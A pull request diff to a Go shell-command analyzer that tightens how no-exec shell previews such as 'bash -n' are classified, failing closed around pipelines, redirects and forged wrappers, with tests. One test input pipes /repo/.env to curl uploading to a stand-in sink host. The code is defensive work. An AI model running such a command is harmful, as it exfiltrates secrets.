### PR TITLE
fix(actionfacts): honor isolated noexec shell previews

### DIFF
--- a/internal/actionfacts/analyze.go
+++ b/internal/actionfacts/analyze.go
@@ -259,15 +259,18 @@ func analyzeStructuredArgv(
 		child = parsePOSIX(nested, out.nextID, wrapperDepth+1)
 	case "bash", "sh", "zsh", "dash", "ksh", "mksh":
 		invocation := parsePOSIXShellInvocation(program, argv)
+		if invocation.valid && invocation.noExec &&
+			(invocation.mode == posixShellModeCommand ||
+				invocation.mode == posixShellModeScript) {
+			// Classification applies the preview only after it can prove that
+			// the command is structurally isolated from pipelines and redirects.
+			return out
+		}
 		if !invocation.valid ||
 			invocation.mode != posixShellModeCommand ||
 			invocation.commandIndex >= len(argv) ||
 			strings.TrimSpace(argv[invocation.commandIndex]) == "" {
 			out.markUnsupported(IssueUnsupportedConstruct)
-			return out
-		}
-		if invocation.noExec {
-			out.commands[0].Effect = EffectPreview
 			return out
 		}
 		if wrapperDepth >= maxWrapperDepth {
@@ -453,6 +456,84 @@ type posixShellInvocation struct {
 	interactive  bool
 	recognized   bool
 	valid        bool
+}
+
+func provesIsolatedPOSIXNoExecPreview(
+	out *parseOutput,
+	command *CommandFact,
+	invocation posixShellInvocation,
+	mode posixShellMode,
+) bool {
+	return invocation.valid && invocation.mode == mode && invocation.noExec &&
+		isolatedPOSIXCommand(out, command)
+}
+
+func isolatedPOSIXCommand(out *parseOutput, command *CommandFact) bool {
+	if out == nil || command == nil || out.status != StatusComplete {
+		return false
+	}
+	commandsByID := make(map[int64]*CommandFact, len(out.commands))
+	for index := range out.commands {
+		candidate := &out.commands[index]
+		if candidate.ID == 0 {
+			return false
+		}
+		if _, duplicate := commandsByID[candidate.ID]; duplicate {
+			return false
+		}
+		commandsByID[candidate.ID] = candidate
+	}
+	current, ok := commandsByID[command.ID]
+	if !ok {
+		return false
+	}
+	visited := make(map[int64]struct{}, len(out.commands))
+	for {
+		if current.ID == 0 {
+			return false
+		}
+		if _, seen := visited[current.ID]; seen {
+			return false
+		}
+		visited[current.ID] = struct{}{}
+		if current.PipelineID != 0 || len(current.Redirects) != 0 {
+			return false
+		}
+		if current.ParentCommandID == 0 {
+			return true
+		}
+		parent, ok := commandsByID[current.ParentCommandID]
+		if !ok || !exactTransparentPOSIXWrapper(parent, current) {
+			return false
+		}
+		current = parent
+	}
+}
+
+func exactTransparentPOSIXWrapper(
+	command *CommandFact,
+	child *CommandFact,
+) bool {
+	if command == nil || child == nil ||
+		(command.Dialect != DialectPOSIX && command.Dialect != DialectArgv) ||
+		command.Effect != EffectExecute || !command.ArgvComplete ||
+		len(command.Argv) < 2 || command.Program == "" ||
+		command.Program != commandProgramForDialect(
+			command.Executable,
+			command.Dialect,
+		) {
+		return false
+	}
+	switch command.Program {
+	case "env", "command", "exec":
+		nested, ok, uncertain := staticPOSIXWrapperArgv(
+			command.Argv,
+			command.Program,
+		)
+		return ok && !uncertain && equalStrings(nested, child.Argv)
+	default:
+		return false
+	}
 }
 
 func parsePOSIXShellInvocation(
@@ -1699,6 +1780,23 @@ func enforceAnalyzeAuthority(out *parseOutput) {
 				command.Argv,
 			)
 			if invocation.valid && invocation.mode == posixShellModeCommand {
+				if !invocation.noExec || provesIsolatedPOSIXNoExecPreview(
+					out,
+					command,
+					invocation,
+					posixShellModeCommand,
+				) {
+					continue
+				}
+				out.markPartial(IssueUnsupportedConstruct)
+				continue
+			}
+			if provesIsolatedPOSIXNoExecPreview(
+				out,
+				command,
+				invocation,
+				posixShellModeScript,
+			) {
 				continue
 			}
 			if _, script := exactPOSIXShellScriptOperand(

--- a/internal/actionfacts/analyze.go
+++ b/internal/actionfacts/analyze.go
@@ -17,6 +17,7 @@
 package actionfacts
 
 import (
+	"path"
 	"strings"
 	"unicode"
 	"unicode/utf8"
@@ -170,10 +171,11 @@ func analyze(input Input) Facts {
 	}
 
 	addToolArgumentFacts(&base, input.Tool, extracted)
-	deduplicateFacts(&base)
 	if base.hasFacts() && base.status == StatusNotApplicable {
 		base.status = StatusComplete
 	}
+	finalizePOSIXNoExecPreviews(&base)
+	deduplicateFacts(&base)
 	activeHome, _ := normalizeActiveHome(input.ActiveHome)
 	return base.factsWithContext(
 		safeToolName(input.Tool),
@@ -458,18 +460,8 @@ type posixShellInvocation struct {
 	valid        bool
 }
 
-func provesIsolatedPOSIXNoExecPreview(
-	out *parseOutput,
-	command *CommandFact,
-	invocation posixShellInvocation,
-	mode posixShellMode,
-) bool {
-	return invocation.valid && invocation.mode == mode && invocation.noExec &&
-		isolatedPOSIXCommand(out, command)
-}
-
 func isolatedPOSIXCommand(out *parseOutput, command *CommandFact) bool {
-	if out == nil || command == nil || out.status != StatusComplete {
+	if out == nil || command == nil {
 		return false
 	}
 	commandsByID := make(map[int64]*CommandFact, len(out.commands))
@@ -518,10 +510,7 @@ func exactTransparentPOSIXWrapper(
 		(command.Dialect != DialectPOSIX && command.Dialect != DialectArgv) ||
 		command.Effect != EffectExecute || !command.ArgvComplete ||
 		len(command.Argv) < 2 || command.Program == "" ||
-		command.Program != commandProgramForDialect(
-			command.Executable,
-			command.Dialect,
-		) {
+		!exactCaseSensitivePOSIXProgram(command, command.Program) {
 		return false
 	}
 	switch command.Program {
@@ -534,6 +523,44 @@ func exactTransparentPOSIXWrapper(
 	default:
 		return false
 	}
+}
+
+func exactCaseSensitivePOSIXProgram(
+	command *CommandFact,
+	program string,
+) bool {
+	if command == nil || program == "" || command.Executable == "" ||
+		len(command.Argv) == 0 || command.Argv[0] != command.Executable ||
+		strings.ContainsAny(command.Executable, `\:`) ||
+		command.Executable != strings.ToLower(command.Executable) {
+		return false
+	}
+	executable := command.Executable
+	if strings.ContainsRune(executable, '/') {
+		if !strings.HasPrefix(executable, "/") || path.Clean(executable) != executable ||
+			path.Base(executable) != program {
+			return false
+		}
+		trustedDirectory := false
+		for _, directory := range []string{
+			"/bin", "/sbin", "/usr/bin", "/usr/sbin",
+		} {
+			if path.Dir(executable) == directory {
+				trustedDirectory = true
+				break
+			}
+		}
+		if !trustedDirectory {
+			return false
+		}
+	} else if executable != program {
+		return false
+	}
+	return command.Program == program &&
+		command.Program == commandProgramForDialect(
+			command.Executable,
+			command.Dialect,
+		)
 }
 
 func parsePOSIXShellInvocation(
@@ -1780,23 +1807,14 @@ func enforceAnalyzeAuthority(out *parseOutput) {
 				command.Argv,
 			)
 			if invocation.valid && invocation.mode == posixShellModeCommand {
-				if !invocation.noExec || provesIsolatedPOSIXNoExecPreview(
-					out,
-					command,
-					invocation,
-					posixShellModeCommand,
-				) {
+				if !invocation.noExec || command.Effect == EffectPreview {
 					continue
 				}
 				out.markPartial(IssueUnsupportedConstruct)
 				continue
 			}
-			if provesIsolatedPOSIXNoExecPreview(
-				out,
-				command,
-				invocation,
-				posixShellModeScript,
-			) {
+			if invocation.valid && invocation.mode == posixShellModeScript &&
+				invocation.noExec && command.Effect == EffectPreview {
 				continue
 			}
 			if _, script := exactPOSIXShellScriptOperand(

--- a/internal/actionfacts/classify.go
+++ b/internal/actionfacts/classify.go
@@ -2920,7 +2920,40 @@ func classifyShellInvocation(out *parseOutput, command *CommandFact) {
 		return
 	}
 	invocation := parsePOSIXShellInvocation(command.Program, command.Argv)
+	if provesIsolatedPOSIXNoExecPreview(
+		out,
+		command,
+		invocation,
+		posixShellModeScript,
+	) {
+		// No-exec shells parse the selected file without running its commands.
+		// Preserve the file read only when no surrounding pipeline or redirect
+		// can route parser output into another action.
+		command.Effect = EffectPreview
+		if invocation.scriptIndex >= 0 &&
+			invocation.scriptIndex < len(command.Argv) {
+			appendPath(
+				out,
+				command.ID,
+				PathAccessRead,
+				command.Argv[invocation.scriptIndex],
+			)
+		}
+		return
+	}
+	if provesIsolatedPOSIXNoExecPreview(
+		out,
+		command,
+		invocation,
+		posixShellModeCommand,
+	) {
+		command.Effect = EffectPreview
+		return
+	}
 	if invocation.valid && invocation.mode == posixShellModeCommand {
+		if invocation.noExec {
+			out.markPartial(IssueUnsupportedConstruct)
+		}
 		return
 	}
 	if exactPOSIXShellPreviewInvocation(command) {

--- a/internal/actionfacts/classify.go
+++ b/internal/actionfacts/classify.go
@@ -30,13 +30,208 @@ func classifyOutput(out *parseOutput) {
 	if out == nil {
 		return
 	}
+	type deferredPOSIXNoExec struct {
+		commandIndex int
+		invocation   posixShellInvocation
+	}
+	deferred := make([]deferredPOSIXNoExec, 0, len(out.commands))
 	for i := range out.commands {
+		if invocation, ok := validPOSIXNoExecCandidate(&out.commands[i]); ok {
+			deferred = append(deferred, deferredPOSIXNoExec{
+				commandIndex: i,
+				invocation:   invocation,
+			})
+			continue
+		}
 		classifyCommand(out, &out.commands[i])
 		if out.status == StatusLimitExceeded {
 			return
 		}
 	}
+
+	allowPreview := out.status == StatusComplete
+	requiredPreviewPaths := 0
+	if allowPreview {
+		for _, candidate := range deferred {
+			if !isolatedPOSIXCommand(
+				out,
+				&out.commands[candidate.commandIndex],
+			) {
+				allowPreview = false
+				break
+			}
+			if candidate.invocation.mode == posixShellModeScript &&
+				candidate.invocation.scriptIndex >= 0 &&
+				candidate.invocation.scriptIndex <
+					len(out.commands[candidate.commandIndex].Argv) {
+				script := out.commands[candidate.commandIndex].Argv[candidate.invocation.scriptIndex]
+				if script != "" && script != "-" {
+					requiredPreviewPaths++
+				}
+			}
+		}
+	}
+	if allowPreview && requiredPreviewPaths > maxPathFacts-len(out.paths) {
+		out.markLimit(IssueFactLimit)
+		allowPreview = false
+	}
+	if !allowPreview && len(deferred) > 0 {
+		// Freeze the all-or-nothing decision before classifying any deferred
+		// shell. Otherwise an earlier noexec command could become a preview
+		// before a later command makes the final parse non-authoritative.
+		out.markPartial(IssueUnsupportedConstruct)
+	}
+	if out.status == StatusLimitExceeded {
+		deduplicateFacts(out)
+		return
+	}
+	for _, candidate := range deferred {
+		classifyPOSIXNoExecCandidate(
+			out,
+			&out.commands[candidate.commandIndex],
+			candidate.invocation,
+			allowPreview,
+		)
+		if out.status == StatusLimitExceeded {
+			return
+		}
+	}
 	deduplicateFacts(out)
+}
+
+func validPOSIXNoExecCandidate(
+	command *CommandFact,
+) (posixShellInvocation, bool) {
+	if command == nil || command.Effect != EffectExecute {
+		return posixShellInvocation{}, false
+	}
+	return exactPOSIXNoExecInvocation(command)
+}
+
+func exactPOSIXNoExecInvocation(
+	command *CommandFact,
+) (posixShellInvocation, bool) {
+	if command == nil || command.Executable == "" ||
+		(command.Dialect != DialectPOSIX && command.Dialect != DialectArgv) ||
+		!command.ArgvComplete ||
+		len(command.Argv) == 0 || command.Program == "" ||
+		!exactCaseSensitivePOSIXProgram(command, command.Program) {
+		return posixShellInvocation{}, false
+	}
+	invocation := parsePOSIXShellInvocation(command.Program, command.Argv)
+	if !invocation.valid || !invocation.noExec ||
+		(invocation.mode != posixShellModeCommand &&
+			invocation.mode != posixShellModeScript) {
+		return posixShellInvocation{}, false
+	}
+	return invocation, true
+}
+
+// finalizePOSIXNoExecPreviews revokes locally proven previews when a later
+// source merge or tool-argument projection makes the complete action
+// non-authoritative. Revocation is transactional: every matching command is
+// switched back to execution before any bounded path fact is appended.
+func finalizePOSIXNoExecPreviews(out *parseOutput) {
+	if out == nil || out.status == StatusComplete {
+		return
+	}
+	type previewCandidate struct {
+		commandIndex int
+		invocation   posixShellInvocation
+	}
+	candidates := make([]previewCandidate, 0, len(out.commands))
+	for index := range out.commands {
+		command := &out.commands[index]
+		if command.Effect != EffectPreview {
+			continue
+		}
+		invocation, ok := exactPOSIXNoExecInvocation(command)
+		if !ok {
+			continue
+		}
+		candidates = append(candidates, previewCandidate{
+			commandIndex: index,
+			invocation:   invocation,
+		})
+	}
+
+	// No path-capacity failure may leave an earlier candidate as a preview.
+	for _, candidate := range candidates {
+		out.commands[candidate.commandIndex].Effect = EffectExecute
+	}
+	for _, candidate := range candidates {
+		command := &out.commands[candidate.commandIndex]
+		if candidate.invocation.mode != posixShellModeScript ||
+			candidate.invocation.scriptIndex < 0 ||
+			candidate.invocation.scriptIndex >= len(command.Argv) {
+			out.markPartial(IssueUnsupportedConstruct)
+			continue
+		}
+		script := command.Argv[candidate.invocation.scriptIndex]
+		if script == "" || script == "-" {
+			out.markPartial(IssueOpaqueArtifact)
+			continue
+		}
+		reclassified := false
+		for index := range out.paths {
+			fact := &out.paths[index]
+			if fact.CommandID == command.ID && fact.Value == script &&
+				fact.Access == PathAccessRead {
+				fact.Access = PathAccessExecute
+				reclassified = true
+			}
+		}
+		if !reclassified {
+			appendPath(out, command.ID, PathAccessExecute, script)
+		}
+		out.markPartial(IssueOpaqueArtifact)
+	}
+}
+
+func classifyPOSIXNoExecCandidate(
+	out *parseOutput,
+	command *CommandFact,
+	invocation posixShellInvocation,
+	preview bool,
+) {
+	addOperation(command, OperationExecute)
+	if preview && invocation.mode == posixShellModeScript &&
+		(invocation.scriptIndex < 0 ||
+			invocation.scriptIndex >= len(command.Argv)) {
+		// A preview without a proven script operand would hide the artifact
+		// from path enforcement and gateway promotion. Fail closed even if a
+		// future caller violates the invocation parser's index invariant.
+		preview = false
+	}
+	if preview {
+		command.Effect = EffectPreview
+		if invocation.mode == posixShellModeScript {
+			appendPath(
+				out,
+				command.ID,
+				PathAccessRead,
+				command.Argv[invocation.scriptIndex],
+			)
+		}
+		classifyRedirects(out, command)
+		return
+	}
+
+	command.Effect = EffectExecute
+	if invocation.mode == posixShellModeScript &&
+		invocation.scriptIndex >= 0 &&
+		invocation.scriptIndex < len(command.Argv) {
+		appendPath(
+			out,
+			command.ID,
+			PathAccessExecute,
+			command.Argv[invocation.scriptIndex],
+		)
+		out.markPartial(IssueOpaqueArtifact)
+	} else {
+		out.markPartial(IssueUnsupportedConstruct)
+	}
+	classifyRedirects(out, command)
 }
 
 func classifyCommand(out *parseOutput, command *CommandFact) {
@@ -2920,38 +3115,10 @@ func classifyShellInvocation(out *parseOutput, command *CommandFact) {
 		return
 	}
 	invocation := parsePOSIXShellInvocation(command.Program, command.Argv)
-	if provesIsolatedPOSIXNoExecPreview(
-		out,
-		command,
-		invocation,
-		posixShellModeScript,
-	) {
-		// No-exec shells parse the selected file without running its commands.
-		// Preserve the file read only when no surrounding pipeline or redirect
-		// can route parser output into another action.
-		command.Effect = EffectPreview
-		if invocation.scriptIndex >= 0 &&
-			invocation.scriptIndex < len(command.Argv) {
-			appendPath(
-				out,
-				command.ID,
-				PathAccessRead,
-				command.Argv[invocation.scriptIndex],
-			)
-		}
-		return
-	}
-	if provesIsolatedPOSIXNoExecPreview(
-		out,
-		command,
-		invocation,
-		posixShellModeCommand,
-	) {
-		command.Effect = EffectPreview
-		return
-	}
 	if invocation.valid && invocation.mode == posixShellModeCommand {
 		if invocation.noExec {
+			// classifyOutput owns the order-independent noexec preview decision.
+			// Any candidate reaching this fallback path must remain opaque.
 			out.markPartial(IssueUnsupportedConstruct)
 		}
 		return

--- a/internal/actionfacts/posix.go
+++ b/internal/actionfacts/posix.go
@@ -639,7 +639,16 @@ func expandStaticPOSIXWrappers(out *parseOutput, wrapperDepth int) {
 				continue
 			}
 			if invocation.noExec {
-				setPOSIXCommandEffect(out, command.ID, EffectPreview)
+				if !provesIsolatedPOSIXNoExecPreview(
+					out,
+					&command,
+					invocation,
+					posixShellModeCommand,
+				) {
+					// A pipeline or redirect can route shell parser output into
+					// another action. Retain an opaque executing carrier for fallback.
+					out.markPartial(IssueUnsupportedConstruct)
+				}
 				continue
 			}
 			if wrapperDepth >= maxWrapperDepth {
@@ -713,19 +722,6 @@ func expandStaticPOSIXWrappers(out *parseOutput, wrapperDepth int) {
 			)
 		}
 		out.mergeNested(child)
-	}
-}
-
-func setPOSIXCommandEffect(
-	out *parseOutput,
-	commandID int64,
-	effect CommandEffect,
-) {
-	for index := range out.commands {
-		if out.commands[index].ID == commandID {
-			out.commands[index].Effect = effect
-			return
-		}
 	}
 }
 

--- a/internal/actionfacts/posix.go
+++ b/internal/actionfacts/posix.go
@@ -639,16 +639,8 @@ func expandStaticPOSIXWrappers(out *parseOutput, wrapperDepth int) {
 				continue
 			}
 			if invocation.noExec {
-				if !provesIsolatedPOSIXNoExecPreview(
-					out,
-					&command,
-					invocation,
-					posixShellModeCommand,
-				) {
-					// A pipeline or redirect can route shell parser output into
-					// another action. Retain an opaque executing carrier for fallback.
-					out.markPartial(IssueUnsupportedConstruct)
-				}
+				// Defer the all-or-nothing preview decision until classifyOutput
+				// has established the final status of every non-noexec command.
 				continue
 			}
 			if wrapperDepth >= maxWrapperDepth {

--- a/internal/actionfacts/posix_shell_invocation_test.go
+++ b/internal/actionfacts/posix_shell_invocation_test.go
@@ -153,6 +153,142 @@ func TestParsePOSIXShellInvocationModesAndFinalNoExecState(t *testing.T) {
 	}
 }
 
+func TestIsolatedPOSIXCommandFailsClosedOnBrokenAncestry(t *testing.T) {
+	standalone := CommandFact{ID: 1}
+	if !isolatedPOSIXCommand(&parseOutput{
+		status: StatusComplete, commands: []CommandFact{standalone},
+	}, &standalone) {
+		t.Fatal("standalone command was not isolated")
+	}
+	if isolatedPOSIXCommand(&parseOutput{
+		status: StatusPartial, commands: []CommandFact{standalone},
+	}, &standalone) {
+		t.Fatal("partial parse was classified isolated")
+	}
+
+	for _, test := range []struct {
+		name    string
+		command CommandFact
+		out     parseOutput
+	}{
+		{
+			name:    "pipeline",
+			command: CommandFact{ID: 1, PipelineID: 7},
+			out:     parseOutput{commands: []CommandFact{{ID: 1, PipelineID: 7}}},
+		},
+		{
+			name:    "redirect",
+			command: CommandFact{ID: 1, Redirects: []RedirectFact{{FD: 1}}},
+			out: parseOutput{commands: []CommandFact{{
+				ID: 1, Redirects: []RedirectFact{{FD: 1}},
+			}}},
+		},
+		{
+			name:    "ancestor pipeline",
+			command: CommandFact{ID: 2, ParentCommandID: 1},
+			out: parseOutput{commands: []CommandFact{
+				{ID: 1, PipelineID: 7},
+				{ID: 2, ParentCommandID: 1},
+			}},
+		},
+		{
+			name:    "ancestor redirect",
+			command: CommandFact{ID: 2, ParentCommandID: 1},
+			out: parseOutput{commands: []CommandFact{
+				{ID: 1, Redirects: []RedirectFact{{FD: 1}}},
+				{ID: 2, ParentCommandID: 1},
+			}},
+		},
+		{
+			name:    "starting ID absent",
+			command: CommandFact{ID: 2},
+			out:     parseOutput{commands: []CommandFact{{ID: 1}}},
+		},
+		{
+			name:    "starting ID zero",
+			command: CommandFact{},
+			out:     parseOutput{commands: []CommandFact{{ID: 1}}},
+		},
+		{
+			name:    "forged start cannot hide pipeline",
+			command: CommandFact{ID: 1},
+			out:     parseOutput{commands: []CommandFact{{ID: 1, PipelineID: 7}}},
+		},
+		{
+			name:    "missing parent",
+			command: CommandFact{ID: 2, ParentCommandID: 1},
+			out:     parseOutput{commands: []CommandFact{{ID: 2, ParentCommandID: 1}}},
+		},
+		{
+			name:    "cycle",
+			command: CommandFact{ID: 1, ParentCommandID: 2},
+			out: parseOutput{commands: []CommandFact{
+				{ID: 1, ParentCommandID: 2},
+				{ID: 2, ParentCommandID: 1},
+			}},
+		},
+		{
+			name:    "self cycle",
+			command: CommandFact{ID: 1, ParentCommandID: 1},
+			out:     parseOutput{commands: []CommandFact{{ID: 1, ParentCommandID: 1}}},
+		},
+		{
+			name:    "duplicate ID",
+			command: CommandFact{ID: 1},
+			out: parseOutput{commands: []CommandFact{
+				{ID: 1},
+				{ID: 1},
+			}},
+		},
+	} {
+		t.Run(test.name, func(t *testing.T) {
+			test.out.status = StatusComplete
+			if isolatedPOSIXCommand(&test.out, &test.command) {
+				t.Fatalf("unsafe command was classified isolated: %+v", test.out.commands)
+			}
+		})
+	}
+
+	wrapperChild := CommandFact{
+		ID: 2, ParentCommandID: 1, Argv: []string{"bash", "-n", "script.sh"},
+	}
+	wrapper := parseOutput{
+		status: StatusComplete,
+		commands: []CommandFact{
+			{
+				ID: 1, Dialect: DialectPOSIX, Effect: EffectExecute,
+				Executable: "env", Program: "env", ArgvComplete: true,
+				Argv: []string{"env", "bash", "-n", "script.sh"},
+			},
+			wrapperChild,
+		},
+	}
+	if !isolatedPOSIXCommand(&wrapper, &wrapperChild) {
+		t.Fatal("standalone transparent wrapper was not isolated")
+	}
+	forgedProgram := wrapper
+	forgedProgram.commands = cloneCommands(wrapper.commands)
+	forgedProgram.commands[0].Program = "command"
+	if isolatedPOSIXCommand(&forgedProgram, &wrapperChild) {
+		t.Fatal("wrapper with mismatched executable and program was isolated")
+	}
+
+	arbitraryChild := CommandFact{ID: 2, ParentCommandID: 1}
+	arbitrary := parseOutput{
+		status: StatusComplete,
+		commands: []CommandFact{
+			{
+				ID: 1, Dialect: DialectPOSIX, Effect: EffectExecute,
+				Executable: "sudo", Program: "sudo",
+			},
+			arbitraryChild,
+		},
+	}
+	if isolatedPOSIXCommand(&arbitrary, &arbitraryChild) {
+		t.Fatal("arbitrary parent command was treated as a transparent wrapper")
+	}
+}
+
 func TestProvesPOSIXInteractiveShellUsesRecognizedFinalState(t *testing.T) {
 	for _, test := range []struct {
 		name    string

--- a/internal/actionfacts/posix_shell_invocation_test.go
+++ b/internal/actionfacts/posix_shell_invocation_test.go
@@ -274,13 +274,16 @@ func TestIsolatedPOSIXCommandFailsClosedOnBrokenAncestry(t *testing.T) {
 		t.Fatal("wrapper with mismatched executable and argv owner was isolated")
 	}
 
-	arbitraryChild := CommandFact{ID: 2, ParentCommandID: 1}
+	arbitraryChild := CommandFact{
+		ID: 2, ParentCommandID: 1, Argv: []string{"bash", "-n", "script.sh"},
+	}
 	arbitrary := parseOutput{
 		status: StatusComplete,
 		commands: []CommandFact{
 			{
 				ID: 1, Dialect: DialectPOSIX, Effect: EffectExecute,
-				Executable: "sudo", Program: "sudo",
+				Executable: "sudo", Program: "sudo", ArgvComplete: true,
+				Argv: []string{"sudo", "bash", "-n", "script.sh"},
 			},
 			arbitraryChild,
 		},

--- a/internal/actionfacts/posix_shell_invocation_test.go
+++ b/internal/actionfacts/posix_shell_invocation_test.go
@@ -160,11 +160,6 @@ func TestIsolatedPOSIXCommandFailsClosedOnBrokenAncestry(t *testing.T) {
 	}, &standalone) {
 		t.Fatal("standalone command was not isolated")
 	}
-	if isolatedPOSIXCommand(&parseOutput{
-		status: StatusPartial, commands: []CommandFact{standalone},
-	}, &standalone) {
-		t.Fatal("partial parse was classified isolated")
-	}
 
 	for _, test := range []struct {
 		name    string
@@ -272,6 +267,12 @@ func TestIsolatedPOSIXCommandFailsClosedOnBrokenAncestry(t *testing.T) {
 	if isolatedPOSIXCommand(&forgedProgram, &wrapperChild) {
 		t.Fatal("wrapper with mismatched executable and program was isolated")
 	}
+	forgedArgvOwner := wrapper
+	forgedArgvOwner.commands = cloneCommands(wrapper.commands)
+	forgedArgvOwner.commands[0].Argv[0] = "attacker"
+	if isolatedPOSIXCommand(&forgedArgvOwner, &wrapperChild) {
+		t.Fatal("wrapper with mismatched executable and argv owner was isolated")
+	}
 
 	arbitraryChild := CommandFact{ID: 2, ParentCommandID: 1}
 	arbitrary := parseOutput{
@@ -286,6 +287,20 @@ func TestIsolatedPOSIXCommandFailsClosedOnBrokenAncestry(t *testing.T) {
 	}
 	if isolatedPOSIXCommand(&arbitrary, &arbitraryChild) {
 		t.Fatal("arbitrary parent command was treated as a transparent wrapper")
+	}
+}
+
+func TestExactCaseSensitivePOSIXProgramBindsArgvOwner(t *testing.T) {
+	command := CommandFact{
+		Dialect: DialectPOSIX, Executable: "bash", Program: "bash",
+		Argv: []string{"bash", "-n", "script.sh"}, ArgvComplete: true,
+	}
+	if !exactCaseSensitivePOSIXProgram(&command, "bash") {
+		t.Fatal("exact POSIX owner was rejected")
+	}
+	command.Argv[0] = "attacker"
+	if exactCaseSensitivePOSIXProgram(&command, "bash") {
+		t.Fatal("forged argv owner was accepted")
 	}
 }
 

--- a/internal/actionfacts/posix_test.go
+++ b/internal/actionfacts/posix_test.go
@@ -7,11 +7,70 @@
 package actionfacts
 
 import (
+	"fmt"
+	"sort"
 	"strings"
 	"testing"
 
 	"mvdan.cc/sh/v3/syntax"
 )
+
+func noExecScriptSemanticSignature(facts Facts, scripts ...string) string {
+	issues := make([]string, len(facts.Parse.Issues))
+	for index, issue := range facts.Parse.Issues {
+		issues[index] = string(issue)
+	}
+	sort.Strings(issues)
+	var signature strings.Builder
+	fmt.Fprintf(&signature, "status=%s issues=%q", facts.Parse.Status, issues)
+	for _, script := range scripts {
+		commandID := int64(0)
+		effect := CommandEffect("")
+		for _, command := range facts.Commands {
+			invocation := parsePOSIXShellInvocation(command.Program, command.Argv)
+			if invocation.valid && invocation.mode == posixShellModeScript &&
+				invocation.scriptIndex >= 0 &&
+				invocation.scriptIndex < len(command.Argv) &&
+				command.Argv[invocation.scriptIndex] == script {
+				commandID = command.ID
+				effect = command.Effect
+				break
+			}
+		}
+		read := false
+		execute := false
+		for _, fact := range facts.Paths {
+			if fact.CommandID != commandID || fact.Value != script {
+				continue
+			}
+			read = read || fact.Access == PathAccessRead
+			execute = execute || fact.Access == PathAccessExecute
+		}
+		fmt.Fprintf(
+			&signature,
+			" %s={effect:%s,read:%t,execute:%t}",
+			script,
+			effect,
+			read,
+			execute,
+		)
+	}
+	return signature.String()
+}
+
+func exactPOSIXNoExecPreviewCount(facts Facts) int {
+	count := 0
+	for index := range facts.Commands {
+		command := &facts.Commands[index]
+		if command.Effect != EffectPreview {
+			continue
+		}
+		if _, ok := exactPOSIXNoExecInvocation(command); ok {
+			count++
+		}
+	}
+	return count
+}
 
 func TestParsePOSIXLiteralPipelineAndRedirects(t *testing.T) {
 	out := parsePOSIX(`cat "/repo/.env" | curl -T - https://sink.example/upload > result.txt`, 1, 0)
@@ -809,6 +868,510 @@ func TestParsePOSIXNoExecShellScriptBranchContextRemainsOpaque(t *testing.T) {
 	}
 }
 
+func TestParsePOSIXNoExecPreviewUsesFinalClassificationStatus(t *testing.T) {
+	const script = "/tmp/check.sh"
+	baseline := ""
+	for _, test := range []struct {
+		name   string
+		source string
+	}{
+		{
+			name:   "noexec before opaque sibling",
+			source: `bash -n ` + script + `; /tmp/opaque`,
+		},
+		{
+			name:   "opaque sibling before noexec",
+			source: `/tmp/opaque; bash -n ` + script,
+		},
+	} {
+		test := test
+		t.Run(test.name, func(t *testing.T) {
+			facts := Analyze(Input{
+				Tool: "exec", Command: test.source, DialectHint: DialectPOSIX,
+			})
+			if facts.Parse.Status != StatusPartial || facts.Authoritative() ||
+				!containsIssue(facts.Parse.Issues, IssueOpaqueArtifact) ||
+				!factsHavePath(facts, PathAccessExecute, script) ||
+				factsHavePath(facts, PathAccessRead, script) ||
+				!factsHavePath(facts, PathAccessExecute, "/tmp/opaque") {
+				t.Fatalf("order-dependent noexec facts = %#v", facts)
+			}
+			for _, command := range facts.Commands {
+				if command.Program == "bash" && command.ArgvComplete &&
+					len(command.Argv) == 3 && command.Argv[2] == script &&
+					command.Effect != EffectExecute {
+					t.Fatalf("noexec sibling became preview: %#v", command)
+				}
+			}
+			signature := noExecScriptSemanticSignature(facts, script)
+			if baseline == "" {
+				baseline = signature
+			} else if signature != baseline {
+				t.Fatalf("order changed semantics: got %q want %q", signature, baseline)
+			}
+		})
+	}
+}
+
+func TestParsePOSIXNoExecCandidatesFailClosedAsASet(t *testing.T) {
+	const (
+		firstScript  = "/tmp/first.sh"
+		secondScript = "/tmp/second.sh"
+		thirdScript  = "/tmp/third.sh"
+		output       = "/tmp/parser-output"
+	)
+	commands := []string{
+		`bash -n ` + firstScript,
+		`sh -n ` + secondScript + ` > ` + output,
+		`dash -n ` + thirdScript,
+	}
+	permutations := [][]int{
+		{0, 1, 2}, {0, 2, 1}, {1, 0, 2},
+		{1, 2, 0}, {2, 0, 1}, {2, 1, 0},
+	}
+	baseline := ""
+	for _, order := range permutations {
+		order := order
+		name := fmt.Sprintf("order_%d%d%d", order[0], order[1], order[2])
+		t.Run(name, func(t *testing.T) {
+			source := strings.Join([]string{
+				commands[order[0]], commands[order[1]], commands[order[2]],
+			}, "; ")
+			facts := Analyze(Input{
+				Tool: "exec", Command: source, DialectHint: DialectPOSIX,
+			})
+			if facts.Parse.Status != StatusPartial || facts.Authoritative() ||
+				!containsIssue(facts.Parse.Issues, IssueOpaqueArtifact) ||
+				!factsHavePath(facts, PathAccessExecute, firstScript) ||
+				!factsHavePath(facts, PathAccessExecute, secondScript) ||
+				!factsHavePath(facts, PathAccessExecute, thirdScript) ||
+				factsHavePath(facts, PathAccessRead, firstScript) ||
+				factsHavePath(facts, PathAccessRead, secondScript) ||
+				factsHavePath(facts, PathAccessRead, thirdScript) ||
+				!factsHavePath(facts, PathAccessWrite, output) {
+				t.Fatalf("mixed noexec candidates = %#v", facts)
+			}
+			signature := noExecScriptSemanticSignature(
+				facts,
+				firstScript,
+				secondScript,
+				thirdScript,
+			)
+			if baseline == "" {
+				baseline = signature
+			} else if signature != baseline {
+				t.Fatalf("order changed semantics: got %q want %q", signature, baseline)
+			}
+		})
+	}
+}
+
+func TestParsePOSIXNoExecPipelineCandidateFailsClosedAsASet(t *testing.T) {
+	const (
+		firstScript  = "/tmp/first.sh"
+		secondScript = "/tmp/second.sh"
+		thirdScript  = "/tmp/third.sh"
+	)
+	commands := []string{
+		`bash -n ` + firstScript,
+		`sh -n ` + secondScript + ` | cat`,
+		`dash -n ` + thirdScript,
+	}
+	permutations := [][]int{
+		{0, 1, 2}, {0, 2, 1}, {1, 0, 2},
+		{1, 2, 0}, {2, 0, 1}, {2, 1, 0},
+	}
+	baseline := ""
+	for _, order := range permutations {
+		order := order
+		t.Run(fmt.Sprintf("order_%d%d%d", order[0], order[1], order[2]), func(t *testing.T) {
+			facts := Analyze(Input{
+				Tool: "exec",
+				Command: strings.Join([]string{
+					commands[order[0]], commands[order[1]], commands[order[2]],
+				}, "; "),
+				DialectHint: DialectPOSIX,
